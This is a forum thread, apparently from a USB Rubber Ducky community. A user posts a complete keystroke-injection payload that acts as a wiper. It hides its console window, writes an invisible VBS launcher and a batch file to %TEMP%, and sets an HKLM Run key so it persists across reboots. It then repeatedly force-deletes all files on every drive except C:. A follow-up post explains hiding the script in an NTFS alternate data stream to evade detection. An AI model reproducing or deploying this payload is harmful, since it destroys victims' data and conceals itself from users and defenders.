Jump to content

[Payload] Batch wiper response


overwraith

Recommended Posts

I have had a similar payload written for a while, but the stuff that the batch wiper link that Darren provided gave me a few new ideas. I learned how to make a registry key that would restart the batch file on reboot. Apparently this requires admin rights to run since it modifies the registry. You can test this payload on your own machine by replacing the directory and file removing commands with a dir command. I also found a better visual basic file for invisibly running batch files online.

REM By overwraith
REM EraseFlashDrives.txt
REM PURPOSE: to delete the contents of attached drives.
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM THE DIRECTORY YOU WANT TO HIDE THE SCRIPT IN
STRING cd %TEMP%
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: [url="http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up"]http://stackoverflow...indows-boots-up[/url]
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM Delete batch file if already exists
STRING erase /Q SecurityBullseye.bat
ENTER
REM Make the batch file
REM SLIGHT THROWBACK TO VIDEO GAME BIOSHOCK I/II
STRING copy con SecurityBullseye.bat
ENTER
REM REGISTRY KEY RESTARTS THE SCRIPT ON REBOOT
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\SecurityBullseye.bat" /f
ENTER
STRING :while1
ENTER
REM C:\ IS USUALLY THE DRIVE THE OS IS INSTALLED ON, SO OMIT.
STRING for %%a in (A B D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
ENTER
STRING IF EXIST %%a:\ erase /Q /S /F "%%a:\*.*"
ENTER
STRING IF EXIST %%a:\ rmdir /Q /S "%%a:\*"
ENTER
STRING )
ENTER
STRING timeout /t 60
ENTER
STRING goto :while1
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs SecurityBullseye.bat
ENTER
STRING EXIT
ENTER[/CODE]

Edited by overwraith
Link to comment
Share on other sites

May throw in some alternate data stream stuff later. Can hide the batch file behind another file using a colon. The biggest problem would be extracting one file name via the command line, and changing the rest of the script accordingly. Another thing that could make it easier would be just making the file to attach the alternate data stream to, and making it appear to be something windows generated.

File1.txt:SecurityBullseye.bat

Would need specialized software like LADS or The Sleuth Kit to find it.

Example...



C:\Users\UserName>echo hello > File1.txt

C:\Users\UserName>echo hello > File1.txt:SecurityBullseye.txt

C:\Users\UserName>dir *.txt /B
File1.txt

C:\Users\UserName>
[/CODE]

Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...